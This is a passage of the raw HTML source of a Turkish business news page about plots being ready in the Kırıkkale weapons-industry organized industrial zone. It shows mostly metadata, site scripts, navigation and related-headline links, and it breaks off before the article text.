﻿<!DOCTYPE html>
<html lang="tr">
  <head>
        <title>Kırıkkale  Silah İhtisas  OSB’de arsalar hazır</title>
    <meta charset="utf-8">
    <!--meta name="viewport" content="width=device-width, initial-scale=1.0"-->
    <meta name="description" content="Kırıkkale Valisi Mehmet İlker Haktankaçmaz Kırıkkale Silah İhtisas OSB&#039;de gelinen durumu açıkladı. Silah İhtisas OSB&#039;nin Türkiye&#039;de">
    <meta name="keywords" content="Kırıkkale  Silah İhtisas  OSB, OSB">
    <meta property="fb:admins" content="">
        <meta property="og:site_name" content="Kırıkkale  Silah İhtisas  OSB’de arsalar hazır">
    <meta property="og:title" content="Kırıkkale  Silah İhtisas  OSB’de arsalar hazır">
    <meta property="og:description" content="Kırıkkale Valisi Mehmet İlker Haktankaçmaz Kırıkkale Silah İhtisas OSB&#039;de gelinen durumu açıkladı. Silah İhtisas OSB&#039;nin Türkiye&#039;de"> 
    <meta property="og:url" content="http://www.kobi-efor.com.tr/osb-den-haber/kirikkale-silah-ihtisas-osbde-arsalar-hazir-h7063.html">
    <meta property="og:image" content="http://www.kobi-efor.com.tr/images/haberler/kirikkale_silah_ihtisas_osbde_arsalar_hazir_h7063_d7574.jpg">    <meta property="og:type" content="article">
        <meta http-equiv="refresh" content="1800">    <meta name="twitter:card" content="summary_large_image">        <meta name="twitter:url" content="http://www.kobi-efor.com.tr/osb-den-haber/kirikkale-silah-ihtisas-osbde-arsalar-hazir-h7063.html">
    <meta name="twitter:domain" content="http://www.kobi-efor.com.tr/">
    <meta name="twitter:site" content="">
    <meta name="twitter:title" content="Kırıkkale  Silah İhtisas  OSB’de arsalar hazır">    <meta name="twitter:description" content="Kırıkkale Valisi Mehmet İlker Haktankaçmaz, Kırıkkale Silah İhtisas OSB’de gelinen durumu açıkladı. Silah İhtisas OSB&#039;nin Türkiye&#039;de ilk ve tek olduğunu vurgulayan Haktankaçmaz, şunları söyledi:">
    <meta name="twitter:image:src" content="http://www.kobi-efor.com.tr/images/haberler/kirikkale_silah_ihtisas_osbde_arsalar_hazir_h7063_d7574.jpg">        <link href="http://www.kobi-efor.com.tr/_themes/hs-vertigo/style/base.min.css" rel="stylesheet">
    <link href="http://www.kobi-efor.com.tr/_themes/hs-vertigo/style/icons.css" rel="stylesheet">
    <link href="http://www.kobi-efor.com.tr/_themes/hs-vertigo/style/style.css" rel="stylesheet">
    <link href="http://www.kobi-efor.com.tr/_themes/hs-vertigo/style/hs.css" rel="stylesheet">
   
        <link href="http://www.kobi-efor.com.tr/_themes/hs-vertigo/style/print.css" rel="stylesheet" media="print, handheld">    <link rel="alternate" type="application/rss+xml" title="RSS servisi" href="http://www.kobi-efor.com.tr/rss.php" />
    <link rel="shortcut icon" href="http://www.kobi-efor.com.tr/_themes/hs-vertigo/images/favicon.ico">
    <link href="https://fonts.googleapis.com/css?family=PT+Sans:400,700&subset=latin,latin-ext" rel="stylesheet" type="text/css">
    <link rel="canonical" href="http://www.kobi-efor.com.tr/osb-den-haber/kirikkale-silah-ihtisas-osbde-arsalar-hazir-h7063.html">

     

    <!--[if gte IE 9]>
    <style type="text/css">
        .gradient {
            filter: none;
        }
    </style>
    <![endif]-->
    <!--[if IE 7]>
    <style type="text/css">
        .reklam.dikey.sol .fixed {
            margin-left:-px;
        }
    </style>
    <![endif]-->

    <script type="text/javascript">
    var site_url   = 'http://www.kobi-efor.com.tr/';
    var tema       = 'hs-vertigo';
    var theme_path = 'http://www.kobi-efor.com.tr/_themes/hs-vertigo/';
    var ajax_url   = '_ajax/';
    var cat_limit  = '10';
    var poll_voted = '';    var comment_approved = '0';
    var doviz    = '1';
    var lazyload = '1';
    var twitter_user  = '';
    var facebook_user = 'KobiEfor';
    var popup_saat = '1';
    var arkaplan_link = '';    var hava   = '1';
    var hava_default   = 'TUXX0014';
    var namaz   = '1';
    var namaz_default   = 'istanbul';
    var superlig   = '0';

        </script>

        <!-- GOOGLE ANALITIK -->
    <script type="text/javascript">
    	var _gaq = _gaq || [];
    	_gaq.push(['_setAccount', 'UA-26224214-1']);
    	_gaq.push(['_trackPageview']);
    </script>
    <!-- GOOGLE ANALITIK -->
    

    <!--[if lt IE 9]>
      <script src="http://html5shim.googlecode.com/svn/trunk/html5.js"></script>
    <![endif]-->
      </head>
  <body >



      <div class="container center shadow">
        <div class="header">
          <div id="ustkisim" class="row">
          ﻿<!-- UST REKLAM-MENU -->
        <div id="reklammenu" class="span12">
                    <div class="row-fluid">
            <div class="span12">
              <div class="ustmenu">
                <a href="http://www.kobi-efor.com.tr/m/" title="Mobil"><i class="halflings-icon phone"></i> Mobil</a>
                <a href="http://www.kobi-efor.com.tr/kunye.html" title="Künye"><i class="halflings-icon link"></i> Künye</a>
                <a href="http://www.kobi-efor.com.tr/sitene-ekle.html"><i class="halflings-icon plus-sign"></i> Sitene Ekle</a>
                <a href="http://www.kobi-efor.com.tr/iletisim.html" title="İletişim" class="last"><i class="halflings-icon envelope"></i> İletişim</a>

                <div id="memberArea" class="pull-right"></div>
              
              </div>
            </div>
          </div>
        </div>
<!-- UST REKLAM-MENU ***************************************************** -->
<!-- LOGO REKLAM ALANI -->
        <div id="logo" class="span12">
          <div class="row-fluid">
            <div class="span3">
              <h1 class="logo"><a href="http://www.kobi-efor.com.tr/" class="logo"><img src="http://www.kobi-efor.com.tr/images/banner/kobiefor_logo_190x87png.png" alt="Kırıkkale  Silah İhtisas  OSB’de arsalar hazır" /></a></h1>
            </div>
            <div class="span9">
            <div class="row-fluid">
            <div class="reklam" style="margin-left: -15px;"><a href="http://www.kobi-efor.com.tr/banner.php?id=210" target="_blank" rel="nofollow"><img src="http://www.kobi-efor.com.tr/images/banner/768x90_CM_Banner.gif" width="768" height="90" style="width:768px;height: 90px;border:0" alt="banner210" /></a></div>            </div>
            <div class="row-fluid line">
              <span><i class="halflings-icon time"></i> 23 Aralık 2017 Cumartesi</span>
              <a href="http://facebook.com/KobiEfor" target="_blank" title="Facebook Sayfamız"><i class="social-icon social-fb"></i> Facebook</a>
              <a href="http://twitter.com/" target="_blank" title="Twitter Sayfamız"><i class="social-icon social-tw"></i> Twitter</a>
              <a href="" target="_blank" title="Google Plus Sayfamız"><i class="social-icon social-gl"></i> Google</a>
              <a href="http://www.kobi-efor.com.tr/rss.php" target="_blank" title="RSS Servisi"><i class="social-icon social-rss"></i> RSS</a>
            </div>
            </div>
                      </div>
        </div>
<!-- LOGO REKLAM ALANI ***************************************************** -->
<!-- MENU -->
        <div id="menu" class="span12">
          <div class="row-fluid">
              <div class="anamenu span12">
              <form action="http://www.kobi-efor.com.tr/" method="get" class="pull-right">
                  <input type="hidden" name="m" value="arama">
                  <input type="text" name="q" placeholder="Haber yada kelime ara...">
                  <input type="hidden" name="auth" value="718b7907c700d75cf7cf8fd3ac894a1f3ac4a2f0" />
                  <button class="btn btn-link" type="submit"><i class="halflings-icon white search"></i></button>
              </form>
              <a href="http://www.kobi-efor.com.tr/" class="current darken">&nbsp;<i class="halflings-icon white home"></i>&nbsp;Ana Sayfa</a>
                <a href="http://www.kobi-efor.com.tr/hakkimizda-s4.html"> Hakkımızda</a>
                <a href="http://www.kobi-efor.com.tr/about-us-s5.html"> About Us</a>
                <a href="http://www.kobi-efor.com.tr/galeri/" class="blue"><i class="halflings-icon white picture"></i> Foto Galeri</a>
                <a href="http://www.kobi-efor.com.tr/webtv/" class="yellow"><i class="halflings-icon white film"></i> Web TV</a>
                <a href="http://www.kobi-efor.com.tr/edergi/oku/2017/12/" target="_blank"><i class="halflings-icon white book"></i> E-Dergi</a>
                <a href="http://www.kobi-efor.com.tr/edergi/" target="_blank"><i class="halflings-icon white folder-open"></i> Arşiv</a>
                <!--a href="http://www.kobi-efor.com.tr/biyografiler.html" class=""><i class="halflings-icon white book"></i> Biyografiler</a-->
                

            </div>
          </div>
            <div class="row-fluid sticky-menu">
                              <div class="kategori">
                <a href="http://www.kobi-efor.com.tr/" class="home">&nbsp;<i class="halflings-icon white home"></i>&nbsp;</a>                 
                                  <a title="KAPAK" href="http://www.kobi-efor.com.tr/kapak" id="k1"    >KAPAK</a>
<a title="ETKİNLİK" href="http://www.kobi-efor.com.tr/etkinlik" id="k38"    >ETKİNLİK</a>
<a title="SÖYLEŞİ" href="http://www.kobi-efor.com.tr/soylesi" id="k37"    >SÖYLEŞİ</a>
<a title="OSB" href="http://www.kobi-efor.com.tr/osb" id="k2"    >OSB</a>
<a title="SEKTÖR" href="http://www.kobi-efor.com.tr/sektor" id="k3"    >SEKTÖR</a>
<a title="ÜLKE" href="http://www.kobi-efor.com.tr/ulke" id="k5"    >ÜLKE</a>
<a title="AKADEMİ" href="http://www.kobi-efor.com.tr/akademi" id="k44"    >AKADEMİ</a>
<a title="DESTEK-TEŞVİK" href="http://www.kobi-efor.com.tr/destek-tesvik" id="k45"    >DESTEK-TEŞVİK</a>
<a title="YAŞAM" href="http://www.kobi-efor.com.tr/yasam" id="k47"    >YAŞAM</a>
<a title="HABERLER" href="http://www.kobi-efor.com.tr/haberler" id="k46"    >HABERLER</a>
<div class="other pull-right"><a href="#" class="all" title="Diğer Kategoriler">Tüm Kategoriler</a></div> 
                                              <form action="http://www.kobi-efor.com.tr/" method="get" class="pull-right">
                  <input type="hidden" name="m" value="arama">
                  <input type="text" name="q" placeholder="Haber yada kelime ara...">
                  <input type="hidden" name="auth" value="718b7907c700d75cf7cf8fd3ac894a1f3ac4a2f0" />
                  <button class="btn btn-link" type="submit"><i class="halflings-icon white search"></i></button>
              </form>
                </div>
                <div class="othercat">
                  <div class="inner">
                    <div class="clearfix">
                    
                    </div>
                  </div>
                </div>
                                          
           
          <div id="katicerik" class="row-fluid"><div class="katelement kat_k1">
<div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/kapak/turkiye-ihracat-haftasi-2017-ekonomiyi-ozetledi-toparlaniyoruz-h7011.html" title="‘Türkiye İhracat Haftası 2017 ekonomiyi özetledi: TOPARLANIYORUZ!”"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/turkiye_ihracat_haftasi_2017_ekonomiyi_ozetledi_toparlaniyoruz_h7011_4aec8.jpg" alt="‘Türkiye İhracat Haftası 2017 ekonomiyi özetledi: TOPARLANIYORUZ!”" />
<b>‘Türkiye İhracat Haftası 2017’ ekonomiyi özetledi: “TOPARLANIYORUZ!”</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/kapak/endustri-40-dan-toplum-50-a-hazirol-h6919.html" title="quot;Endüstri 4.0#039;dan Toplum 5.0#039;aquot; HAZIROL!"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/endustri_40_dan_toplum_50_a_hazirol_h6919_662ba.jpg" alt="quot;Endüstri 4.0#039;dan Toplum 5.0#039;aquot; HAZIROL!" />
<b>&quot;Endüstri 4.0&#039;dan Toplum 5.0&#039;a&quot; HAZIROL!</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/kapak/bilim-sanayi-ve-teknoloji-bakani-dr-faruk-ozlu-uretim-icin-yatirimda-vizyon-teknolojik-urun-h6830.html" title="Bilim, Sanayi ve Teknoloji Bakanı Dr. Faruk Özlü: Üretim için yatırımda vizyon; TEKNOLOJİK ÜRÜN"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/bilim_sanayi_ve_teknoloji_bakani_dr_faruk_ozlu_uretim_icin_yatirimda_vizyon_teknolojik_urun_h6830_d7a03.jpg" alt="Bilim, Sanayi ve Teknoloji Bakanı Dr. Faruk Özlü: Üretim için yatırımda vizyon; TEKNOLOJİK ÜRÜN" />
<b>Bilim, Sanayi ve Teknoloji Bakanı Dr. Faruk Özlü: Üretim için yatırımda vizyon; TEKNOLOJİK ÜRÜN</b></a>
</div>
</div><div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/kapak/zamanin-ruhu-emrediyor-her-yerde-ve-seyde-dijitallesin-h6801.html" title="Zamanın ruhu emrediyor; Her Yerde ve Şeyde Dijitalleşin!"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/zamanin_ruhu_emrediyor_her_yerde_ve_seyde_dijitallesin_h6801_1f395.jpg" alt="Zamanın ruhu emrediyor; Her Yerde ve Şeyde Dijitalleşin!" />
<b>Zamanın ruhu emrediyor; Her Yerde ve Şeyde Dijitalleşin!</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/kapak/nesnelerin-interneti-iot-internet-of-things-h6587.html" title="NESNELERİN İNTERNETİ IoT (Internet of Things)"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/nesnelerin_interneti_iot_internet_of_things_h6587_05824.jpg" alt="NESNELERİN İNTERNETİ IoT (Internet of Things)" />
<b>NESNELERİN İNTERNETİ IoT (Internet of Things)</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/kapak/buyume-ve-kalkinmanin-ekosistemi-yasalasti-h6560.html" title="Büyüme ve kalkınmanın ekosistemi yasalaştı"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/buyume_ve_kalkinmanin_ekosistemi_yasalasti_h6560_4c555.jpg" alt="Büyüme ve kalkınmanın ekosistemi yasalaştı" />
<b>Büyüme ve kalkınmanın ekosistemi yasalaştı</b></a>
</div>
</div><div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/kapak/xiii-kobi-zirvesi-mesajini-verdi-kobi-degisir-turkiye-buyur-h6391.html" title="XIII. KOBİ Zirvesi mesajını verdi: KOBİ değişir, Türkiye büyür”"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/xiii_kobi_zirvesi_mesajini_verdi_kobi_degisir_turkiye_buyur_h6391_98831.jpg" alt="XIII. KOBİ Zirvesi mesajını verdi: KOBİ değişir, Türkiye büyür”" />
<b>XIII. KOBİ Zirvesi mesajını verdi: “KOBİ değişir, Türkiye büyür”</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/kapak/20-avrasya-ekonomi-zirvesi-istanbulda-yapildi-h6271.html" title="20. Avrasya Ekonomi Zirvesi, İstanbulda yapıldı"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/20_avrasya_ekonomi_zirvesi_istanbul_da_yapildi_h6271_37d3d.jpg" alt="20. Avrasya Ekonomi Zirvesi, İstanbulda yapıldı" />
<b>20. Avrasya Ekonomi Zirvesi, İstanbul’da yapıldı</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/kapak/20-avrasya-ekonomi-zirvesi-4-6-nisan-2017de-istanbulda-h6195.html" title="20. Avrasya Ekonomi Zirvesi 4-6 Nisan 2017de İstanbulda"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/20_avrasya_ekonomi_zirvesi_4_6_nisan_2017de_istanbulda_h6195_5f739.jpg" alt="20. Avrasya Ekonomi Zirvesi 4-6 Nisan 2017de İstanbulda" />
<b>20. Avrasya Ekonomi Zirvesi 4-6 Nisan 2017’de İstanbul’da</b></a>
</div>
</div></div><div class="katelement kat_k38">
<div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/etkinlik/sanayici-santekte-bulustu-h7016.html" title="Sanayici ‘SANTEKte buluştu"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/sanayici_santekte_bulustu_h7016_e42c0.jpg" alt="Sanayici ‘SANTEKte buluştu" />
<b>Sanayici ‘SANTEK’te buluştu</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/etkinlik/ege-ekonomik-forumu-umutlandirdi-turkiye-batikapi-aciliyor-h6936.html" title="Ege Ekonomik Forumu umutlandırdı. Türkiye BATIKAPI açılıyor!"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/ege_ekonomik_forumu_umutlandirdi_turkiye_batikapi_aciliyor_h6936_508ab.jpg" alt="Ege Ekonomik Forumu umutlandırdı. Türkiye BATIKAPI açılıyor!" />
<b>Ege Ekonomik Forumu umutlandırdı. Türkiye BATIKAPI açılıyor!</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/etkinlik/basbakan-yardimcisi-mehmet-simsekisler-iyi-giderken-reform-yapacagiz-h6835.html" title="Başbakan Yardımcısı Mehmet Şimşek:İşler iyi giderken reform yapacağız”"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/basbakan_yardimcisi_mehmet_simsekisler_iyi_giderken_reform_yapacagiz_h6835_736d6.jpg" alt="Başbakan Yardımcısı Mehmet Şimşek:İşler iyi giderken reform yapacağız”" />
<b>Başbakan Yardımcısı Mehmet Şimşek:“İşler iyi giderken reform yapacağız”</b></a>
</div>
</div><div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/etkinlik/forum-istanbul-2023-h6401.html" title="Forum İstanbul 2023"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/forum_istanbul_2023_h6401_fa8c5.jpg" alt="Forum İstanbul 2023" />
<b>Forum İstanbul 2023</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/etkinlik/hatay-kobilerine-finansal-enformasyon-h5844.html" title="Hatay KOBİlerine finansal enformasyon"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/hatay_kobi_lerine_finansal_enformasyon_h5844_7a0b2.png" alt="Hatay KOBİlerine finansal enformasyon" />
<b>Hatay KOBİ’lerine finansal enformasyon</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/etkinlik/finans-kulup-gencler-ve-kobilerle-bulusuyor-h5150.html" title="Finans Kulüp gençler ve KOBİlerle buluşuyor"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/finans_kulup_gencler_ve_kobilerle_bulusuyor_h5150_04101.png" alt="Finans Kulüp gençler ve KOBİlerle buluşuyor" />
<b>Finans Kulüp gençler ve KOBİ’lerle buluşuyor</b></a>
</div>
</div><div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/etkinlik/turkiye-inovasyon-haftasi-3-gunde-50-bin-kisiyi-bulusturdu-h4840.html" title="‘Türkiye İnovasyon Haftası 3 günde 50 bin kişiyi buluşturdu"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/turkiye_inovasyon_haftasi_3_gunde_50_bin_kisiyi_bulusturdu_h4840_08d3d.png" alt="‘Türkiye İnovasyon Haftası 3 günde 50 bin kişiyi buluşturdu" />
<b>‘Türkiye İnovasyon Haftası’ 3 günde 50 bin kişiyi buluşturdu</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/etkinlik/tbd-32-ulusal-bilisim-kurultayi-ve-2-ankara-bilisim-fuari-h4847.html" title="TBD 32. Ulusal Bilişim Kurultayı ve 2. Ankara Bilişim Fuarı"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/tbd_32_ulusal_bilisim_kurultayi_ve_2_ankara_bilisim_fuari_bilisim_2015citex_2015_h4847_125e6.png" alt="TBD 32. Ulusal Bilişim Kurultayı ve 2. Ankara Bilişim Fuarı" />
<b>TBD 32. Ulusal Bilişim Kurultayı ve 2. Ankara Bilişim Fuarı</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/etkinlik/tosyov-samsunlu-kadin-girisimcileri-egitti-bilincli-kadin-girisimciler-artacak-h4844.html" title="TOSYÖV, Samsunlu kadın girişimcileri eğitti: Bilinçli kadın girişimciler artacak."><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/tosyov_samsunlu_kadin_girisimcileri_egitti_bilincli_kadin_girisimciler_artacak_h4844_b22e9.png" alt="TOSYÖV, Samsunlu kadın girişimcileri eğitti: Bilinçli kadın girişimciler artacak." />
<b>TOSYÖV, Samsunlu kadın girişimcileri eğitti: Bilinçli kadın girişimciler artacak.</b></a>
</div>
</div></div><div class="katelement kat_k37">
<div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/ayin-konugu/ankara-valisi-ercan-topaca-ureterek-donusen-ankara-h7012.html" title="Ankara Valisi Ercan Topaca: Üreterek dönüşen Ankara”"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/ankara_valisi_ercan_topaca_ureterek_donusen_ankara_h7012_75d1f.jpg" alt="Ankara Valisi Ercan Topaca: Üreterek dönüşen Ankara”" />
<b>Ankara Valisi Ercan Topaca: “Üreterek dönüşen Ankara”</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/ceo/anadolu-hayat-emeklilik-genel-muduru-m-ugur-erkan-her-sey-insandan-geciyor-h7017.html" title="Anadolu Hayat Emeklilik Genel Müdürü M. Uğur Erkan; Her şey insandan geçiyor”"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/anadolu_hayat_emeklilik_genel_muduru_m_ugur_erkan_her_sey_insandan_geciyor_h7017_6f834.jpg" alt="Anadolu Hayat Emeklilik Genel Müdürü M. Uğur Erkan; Her şey insandan geçiyor”" />
<b>Anadolu Hayat Emeklilik Genel Müdürü M. Uğur Erkan; “Her şey insandan geçiyor”</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/finans/denizbankin-kobi-stratejisi-kredinin-cok-otesinde-h7018.html" title="DenizBankın KOBİ stratejisi kredinin çok ötesinde…"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/denizbankin_kobi_stratejisi_kredinin_cok_otesinde_h7018_0a656.jpg" alt="DenizBankın KOBİ stratejisi kredinin çok ötesinde…" />
<b>DenizBank’ın KOBİ stratejisi kredinin çok ötesinde…</b></a>
</div>
</div><div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/ekonomist/turkiyenin-problemi-enflasyon-ve-cari-aciktir-buyume-2018de-yavaslar-h7019.html" title="Türkiyenin problemi enflasyon ve cari açıktır” Büyüme 2018de yavaşlar”"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/turkiyenin_problemi_enflasyon_ve_cari_aciktir_buyume_2018de_yavaslar_h7019_61701.jpg" alt="Türkiyenin problemi enflasyon ve cari açıktır” Büyüme 2018de yavaşlar”" />
<b>“Türkiye’nin problemi enflasyon ve cari açıktır” “Büyüme 2018’de yavaşlar”</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/ajans/genc-ve-girisimci-sosyal-medya-ajansi-clubby-media-h7021.html" title="Genç ve girişimci sosyal medya ajansı; Clubby Media"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/genc_ve_girisimci_sosyal_medya_ajansi_clubby_media_h7021_5aec5.jpg" alt="Genç ve girişimci sosyal medya ajansı; Clubby Media" />
<b>Genç ve girişimci sosyal medya ajansı; Clubby Media</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/finans/turkiye-is-bankasi-93-yasinda-kobilerin-cozum-ortagi-h6926.html" title="Türkiye İş Bankası 93 yaşında KOBİlerin çözüm ortağı"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/turkiye_is_bankasi_93_yasinda_kobilerin_cozum_ortagi_h6926_f6f4b.jpg" alt="Türkiye İş Bankası 93 yaşında KOBİlerin çözüm ortağı" />
<b>Türkiye İş Bankası 93 yaşında KOBİ’lerin çözüm ortağı</b></a>
</div>
</div><div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/ekonomist/istanbul-bilgi-universitesi-rektor-vekili-profdr-m-ege-yazgan-butce-acigi-icin-kemer-sikmaya-gerek-yok-h6927.html" title="İstanbul Bilgi Üniversitesi Rektör Vekili Prof.Dr. M. Ege Yazgan: Bütçe açığı için kemer sıkmaya gerek yok”"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/istanbul_bilgi_universitesi_rektor_vekili_profdr_m_ege_yazgan_butce_acigi_icin_kemer_sikmaya_gerek_yok_h6927_bdc00.jpg" alt="İstanbul Bilgi Üniversitesi Rektör Vekili Prof.Dr. M. Ege Yazgan: Bütçe açığı için kemer sıkmaya gerek yok”" />
<b>İstanbul Bilgi Üniversitesi Rektör Vekili Prof.Dr. M. Ege Yazgan: “Bütçe açığı için kemer sıkmaya gerek yok”</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/ajans/dijitalde-360-derece-hizmet-veren-medya-networku-gozone-h6934.html" title="Dijitalde 360 derece hizmet veren medya networkü; Gozone"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/dijitalde_360_derece_hizmet_veren_medya_networku_gozone_h6934_e1883.jpg" alt="Dijitalde 360 derece hizmet veren medya networkü; Gozone" />
<b>Dijitalde 360 derece hizmet veren medya networkü; Gozone</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/ceo/birmot-genel-mudur-yardimcisi-cagri-karaoguz-her-yaptigini-butun-dunya-izliyormus-gibi-yap-h6838.html" title="Birmot Genel Müdür Yardımcısı Çağrı Karaoğuz; Her yaptığını bütün dünya izliyormuş gibi yap”"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/birmot_genel_mudur_yardimcisi_cagri_karaoguz_her_yaptigini_butun_dunya_izliyormus_gibi_yap_h6838_ea2ce.jpg" alt="Birmot Genel Müdür Yardımcısı Çağrı Karaoğuz; Her yaptığını bütün dünya izliyormuş gibi yap”" />
<b>Birmot Genel Müdür Yardımcısı Çağrı Karaoğuz; “Her yaptığını bütün dünya izliyormuş gibi yap”</b></a>
</div>
</div></div><div class="katelement kat_k2">
<div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/osb-tanitim/gebze-plastikciler-organize-sanayi-bolgesi-osb-40a-donusen-ilk-osb-olacak-h7015.html" title="Gebze Plastikçiler Organize Sanayi Bölgesi, OSB 4.0a dönüşen ilk OSB olacak”"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/geposb_yonetim_kurulu_baskani_osman_erkan_gebze_plastikciler_organize_sanayi_bolgesi_osb_40a_donusen_ilk_osb_olacak_h7015_e341e.jpg" alt="Gebze Plastikçiler Organize Sanayi Bölgesi, OSB 4.0a dönüşen ilk OSB olacak”" />
<b>“Gebze Plastikçiler Organize Sanayi Bölgesi, OSB 4.0’a dönüşen ilk OSB olacak”</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/osb-den-haber/ferizli-otomobil-ihtisas-sanayi-bolgesi-geliyor-h7061.html" title="Ferizli Otomobil İhtisas Sanayi Bölgesi geliyor"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/ferizli_otomobil_ihtisas_sanayi_bolgesi_geliyor_h7061_37cd1.jpg" alt="Ferizli Otomobil İhtisas Sanayi Bölgesi geliyor" />
<b>Ferizli Otomobil İhtisas Sanayi Bölgesi geliyor</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/osb-den-haber/gebze-osbye-ar-ge-merkezi-h7033.html" title="Gebze OSBye Ar-Ge Merkezi"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/gebze_osbye_ar_ge_merkezi_h7033_66b39.jpg" alt="Gebze OSBye Ar-Ge Merkezi" />
<b>Gebze OSB’ye Ar-Ge Merkezi</b></a>
</div>
</div><div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/osb-den-haber/kirikkale-silah-ihtisas-osbde-arsalar-hazir-h7063.html" title="Kırıkkale  Silah İhtisas  OSBde arsalar hazır"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/kirikkale_silah_ihtisas_osbde_arsalar_hazir_h7063_d7574.jpg" alt="Kırıkkale  Silah İhtisas  OSBde arsalar hazır" />
<b>Kırıkkale  Silah İhtisas  OSB’de arsalar hazır</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/osb-den-haber/sanliurfada-turkiyenin-en-buyuk-besi-organize-sanayi-bolgesi-yapiliyor-h7034.html" title="Şanlıurfada Türkiyenin en büyük Besi Organize Sanayi Bölgesi yapılıyor"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/sanliurfada_turkiyenin_en_buyuk_besi_organize_sanayi_bolgesi_yapiliyor_h7034_0fb17.jpg" alt="Şanlıurfada Türkiyenin en büyük Besi Organize Sanayi Bölgesi yapılıyor" />
<b>Şanlıurfa’da Türkiye’nin en büyük Besi Organize Sanayi Bölgesi yapılıyor</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/osb-den-haber/erzincan-osb-gunesle-gelen-guc-h7032.html" title="Erzincan OSB: quot;Güneşle Gelen Güçquot;"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/erzincan_osb_gunesle_gelen_guc_h7032_f8d8f.jpg" alt="Erzincan OSB: quot;Güneşle Gelen Güçquot;" />
<b>Erzincan OSB: &quot;Güneşle Gelen Güç&quot;</b></a>
</div>
</div><div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/osb-den-haber/alikahya-osbde-tesisler-yukseliyor-h7031.html" title="Alikahya OSBde tesisler yükseliyor"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/alikahya_osbde_tesisler_yukseliyor_h7031_9dcf4.jpg" alt="Alikahya OSBde tesisler yükseliyor" />
<b>Alikahya OSB’de tesisler yükseliyor</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/osb-den-haber/diyarbakir-da-bagimsiz-tekstil-kenti-kuruluyor-h7062.html" title="Diyarbakır#039;da bağımsız ‘Tekstil Kenti kuruluyor"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/diyarbakir_da_bagimsiz_tekstil_kenti_kuruluyor_h7062_960bb.jpg" alt="Diyarbakır#039;da bağımsız ‘Tekstil Kenti kuruluyor" />
<b>Diyarbakır&#039;da bağımsız ‘Tekstil Kenti’ kuruluyor</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/osb-tanitim/gaziantep-organize-sanayi-bolgesi-h6933.html" title="Gaziantep Organize Sanayi Bölgesi"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/gaziantep_organize_sanayi_bolgesi_h6933_9f065.jpg" alt="Gaziantep Organize Sanayi Bölgesi" />
<b>Gaziantep Organize Sanayi Bölgesi</b></a>
</div>
</div></div><div class="katelement kat_k3">
<div class="span4"><div>
